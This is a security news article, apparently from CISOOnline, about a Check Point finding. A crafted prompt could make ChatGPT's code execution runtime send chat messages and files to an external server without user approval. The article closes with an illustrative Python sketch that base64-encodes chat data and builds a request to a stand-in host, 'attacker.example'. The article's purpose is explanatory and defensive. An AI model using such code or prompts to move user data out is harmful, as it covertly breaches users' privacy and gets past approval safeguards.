CISOOnline

OpenAI patches twin leaks as Codex slips and ChatGPT spills

ChatGPT’s hidden outbound channel leaks user data

OpenAI has reportedly fixed a parallel bug in ChatGPT that goes beyond credential theft. Check Point researchers uncovered a hidden outbound communication path in ChatGPT’s code execution runtime that could be triggered with a single malicious prompt.

This channel bypassed the platform's expected safeguards around external data sharing. Instead of requiring explicit user approval, the runtime could transmit data (such as chat messages, uploaded files, or generated outputs) to an external server without any visible alert.

Check Point researchers demonstrated crafting a prompt that leverages this behavior, allowing the runtime to package and transmit private chat data to an external server. In effect, a normal-looking conversation could be turned into a covert data exfiltration pipeline.
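To make the mechanism concrete, here is a minimal sketch of what such an exfiltration step could look like inside a code execution sandbox with unrestricted outbound network access. Everything here is illustrative: the endpoint, function names, and encoding scheme are assumptions for demonstration, not details from the Check Point report, and the actual network call is left commented out.

```python
import base64
import json
import urllib.request

# Hypothetical attacker-controlled endpoint, not from the report.
ATTACKER_HOST = "https://attacker.example/collect"

def package_for_exfil(chat_messages):
    """Encode chat data so it travels as an innocuous-looking query parameter."""
    blob = json.dumps(chat_messages).encode("utf-8")
    return base64.urlsafe_b64encode(blob).decode("ascii")

def exfiltrate(chat_messages):
    """Build the covert outbound request a malicious prompt could trigger."""
    token = package_for_exfil(chat_messages)
    req = urllib.request.Request(f"{ATTACKER_HOST}?d={token}")
    # In the vulnerable runtime, a request like this could fire with no
    # user-visible alert or approval prompt guarding the network call.
    # urllib.request.urlopen(req)  # not executed in this sketch
    return req.full_url
```

The point of the sketch is that nothing in the code looks obviously malicious to a casual observer: the payload is just a base64 query parameter on an ordinary HTTPS request, which is why the absence of an approval gate on outbound traffic matters.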
